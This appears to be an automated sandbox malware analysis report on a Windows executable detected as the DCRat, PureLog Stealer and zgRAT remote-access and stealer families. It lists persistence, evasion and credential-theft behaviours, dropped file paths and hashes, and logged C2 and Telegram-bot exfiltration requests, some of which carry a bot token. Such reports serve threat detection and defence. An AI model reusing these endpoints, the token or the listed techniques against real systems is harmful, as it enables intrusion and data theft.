Windows Analysis Report
W4tW72sfAD.exe

Overview

General Information

Sample name: W4tW72sfAD.exe
renamed because original name is a hash value
Original sample name: 9026338FCE277581062754CAB87462E7.exe
Analysis ID: 1428727
MD5: 9026338fce277581062754cab87462e7
SHA1: 191b8d92c18b84fdef03f691583d8b89598cb7da
SHA256: 5565710131f195b46fb7c0b124d16df72ec5e0aafdd22590eaff7885aead636f
Tags: DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: W4tW72sfAD.exe Avira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\GNRoGDmH.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\EkAnmMVM.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\BazpdGXT.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe ReversingLabs: Detection: 68%
Source: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe ReversingLabs: Detection: 68%
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe ReversingLabs: Detection: 68%
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe ReversingLabs: Detection: 68%
Source: C:\Users\Public\Downloads\RuntimeBroker.exe ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\BazpdGXT.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\EkAnmMVM.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\NEEtYbtY.log ReversingLabs: Detection: 66%
Multi AV Scanner detection for submitted file
Source: W4tW72sfAD.exe ReversingLabs: Detection: 68%
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BuKwfPUT.log Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Joe Sandbox ML: detected
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: W4tW72sfAD.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: W4tW72sfAD.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\9da3c047e935b1 Jump to behavior
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: W4tW72sfAD.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.pdb source: W4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003702000.00000004.00000800.00020000.00000000.sdmp

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 4x nop then jmp 00007FFD9B890356h 19_2_00007FFD9B89014E
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 4x nop then jmp 00007FFD9B890356h 20_2_00007FFD9B89014E
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 4x nop then jmp 00007FFD9B8B0356h 21_2_00007FFD9B8B014E
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 4x nop then jmp 00007FFD9B890356h 22_2_00007FFD9B89014E
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 4x nop then jmp 00007FFD9B8A0356h 38_2_00007FFD9B8A014E
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Code function: 4x nop then jmp 00007FFD9B8B0356h 41_2_00007FFD9B8B014E
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Code function: 4x nop then jmp 00007FFD9B890356h 44_2_00007FFD9B89014E

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 104.21.57.61:80
Performs DNS queries to domains with low reputation
Source: DNS query: minecrafthyipixel.xyz
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic HTTP traffic detected: POST /bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="375a82a9-434c-43d0-8d25-c0ccd816cce2"Host: api.telegram.orgContent-Length: 100984Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 376Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 1876Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----SKVkDmmIXvVPlbJZk2vuH9rP9KPHZ1VSviUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 147982Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2172Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2180Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2192Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: minecrafthyipixel.xyzContent-Length: 2172Expect: 100-continueConnection: Keep-Alive
